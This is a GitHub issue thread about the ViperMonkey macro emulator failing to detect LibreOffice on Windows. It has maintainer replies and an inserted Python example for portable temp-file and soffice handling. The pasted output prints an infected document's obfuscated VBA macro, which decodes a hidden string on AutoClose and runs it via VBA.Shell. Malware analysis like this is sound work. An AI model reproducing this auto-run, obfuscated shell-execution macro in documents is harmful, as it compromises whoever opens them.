Vipermonkey says LibreOffice not installed, but it is

Open opticoax747 opened this issue 5 years ago • 4 comments

Running vipermonkey on flare-vm cygwin environment, trying to parse an infected .docm.

LibreOffice is installed, but Vipermonkey doesn't see it and errors out:

FILE: c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm
INFO Starting emulation...
INFO Emulating an Office (VBA) file. VBScript support is temporarily disabled in this version.

INFO Reading document metadata...
WARNING Reading in metadata failed. Trying fallback. not an OLE2 structured storage file
ERROR Cannot read metadata with exiftool. [Error 2] The system cannot find the file specified
ERROR Reading in file as Excel with xlrd failed. ZIP file contents not a known type of workbook

ERROR Cannot convert Excel file with LibreOffice. LibreOffice not installed.
INFO Saving dropped analysis artifacts in c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm_artifacts/
INFO Parsing VB...
Error: [Errno 2] No such file or directory: u'word/vbaProject.bin'.

VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'



VBA CODE (with long lines collapsed):

Sub AutoClose()
    roans = Array("d", "J", "t", "s", "e", "A", "h", "0", "h", "j", "t", "s", "s", "V", "o", "q", "q", "n", "P", "5", "Z", "n", "9", "P", "L", "l", "n", "9", "5", "n", "t", "9", "h", "9", "A", "x", "E", "d", "q", "G", "Q", "q", "J", "d", "5", "0", "A", "V", "t", "V", "N", "L", "s", "d", "e", "X", "P", "E", "l", "P")
    totoro = ceraunogram(roans)
    Application.Run "chillumchee", (totoro)
End Sub

Private Sub chillumchee(brothy)
    declination = 6162
    samoan = True
    While samoan
        boneblack = declination + 222
        If boneblack - declination > 111 Then
            VBA.Shell brothy, vbNormalFocus - 1
            samoan = False
        End If
    Wend
End Sub

Public Function trinely(germaneness, preludium)
    russophobist = 9090
    categoryator = -1
    For Each drolled In preludium
        If drolled = germaneness Then
            russophobist = categoryator
            Exit For
        End If
        categoryator = categoryator + 1
    Next
    If russophobist = 9090 Then
        russophobist = -1
    End If
    trinely = russophobist + 1
End Function

Private Function ceraunogram(roans)
    malope = Array("s", "P", "G", "q", "e", "d", "9", "Q", "x", "E", "j", "n", "N", "X", "t", "h", "L", "o", "V", "0", "A", "J", "Z", "5", "l")
    roughhoused = Array("t", "d", "N", "/", "a", "m", "w", "A", "c", "o", " ", "q", "?", "=", "h", "e", "u", ":", "p", "x", ".", "s", "j", "i", "n")
    erasable = vbNullString
    For Each paraphrenic In roans
        ore = Application.Run("trinely", paraphrenic, malope)
        If ore > -1 And ore < 8080 Then
            erasable = roughhoused(ore) + erasable
        End If
    Next
    ceraunogram = StrReverse(erasable)
End Function

PARSING VBA CODE:
INFO parsed Sub AutoClose (): 3 statement(s)
INFO parsed Sub chillumchee ([ByRef brothy]): 3 statement(s)
INFO parsed Function trinely ([ByRef germaneness, ByRef preludium]): 5 statement(s)
INFO parsed Function ceraunogram ([ByRef roans]): 5 statement(s)
INFO Reading document variables...
INFO Reading Shapes object text fields...
Traceback (most recent call last):
  File "vmonkey.py", line 1311, in _process_file
    shape_text = read_ole_fields._get_shapes_text_values(data, 'worddocument')
  File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 371, in _get_shapes_text_values
    r = _get_shapes_text_values_2007(fname)
  File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 223, in _get_shapes_text_values_2007
    f = open(tmp_name, 'wb')
IOError: [Errno 2] No such file or directory: '/tmp/9762170042.office'
ERROR [Errno 2] No such file or directory: '/tmp/9762170042.office'

c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey

Dec 23 '19 17:12 opticoax747

I think for now the call to LibreOffice only works on Linux. Usually on Windows it displays an error but does not stop. I'll have a look.

Jan 02 '20 09:01 decalage2

OK, I will try to get a licensed version of Word on Windows? Would that be better?

Jan 08 '20 10:01 opticoax747

No no, I just meant the code in ViperMonkey which deals with LibreOffice is only designed to work on Linux, because it uses paths like /tmp (see the error message you pasted above). What we need to do (if somebody has time), is to improve the code so that it can work with LibreOffice on Windows too.

Jan 08 '20 11:01 decalage2
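
Added example, not part of the thread and not ViperMonkey's own code: one way, in Python 3, to avoid the hardcoded `/tmp` path seen in the traceback and to locate LibreOffice on Windows as well as Linux. The function names and the install locations listed are assumptions.

```python
import os
import shutil
import sys
import tempfile

# Assumed default install locations; not taken from ViperMonkey.
CANDIDATES = {
    "win32": [
        r"C:\Program Files\LibreOffice\program\soffice.exe",
        r"C:\Program Files (x86)\LibreOffice\program\soffice.exe",
    ],
    "darwin": ["/Applications/LibreOffice.app/Contents/MacOS/soffice"],
}


def find_soffice(platform=sys.platform, which=shutil.which, exists=os.path.isfile):
    """Return the path of the LibreOffice binary, or None if it is not found."""
    # PATH lookup works on every platform when the binary is exposed there.
    for name in ("soffice", "libreoffice"):
        hit = which(name)
        if hit:
            return hit
    # Otherwise fall back to the platform's usual install directory.
    for path in CANDIDATES.get(platform, []):
        if exists(path):
            return path
    return None


def write_temp_copy(data, suffix=".office"):
    """Write the sample bytes to a new file in the platform's temp directory.

    tempfile.mkstemp resolves the directory itself (TMP/TEMP on Windows,
    TMPDIR or /tmp on Linux) and creates the file exclusively under an
    unpredictable name, so no other process on the analysis host can
    pre-create or swap the file.
    """
    fd, path = tempfile.mkstemp(suffix=suffix)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


if __name__ == "__main__":
    sample = b"PK\x03\x04 constructed sample bytes"
    tmp_name = write_temp_copy(sample)
    print("temp copy:", tmp_name)
    print("soffice:", find_soffice() or "not found")
    os.remove(tmp_name)
```

The caller is responsible for deleting the temp copy once the conversion has finished.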

I did hardcode the path to Windows Libre Office into the .py, but it still errored out.

I think my office will give me a Word license...

Jan 08 '20 12:01 opticoax747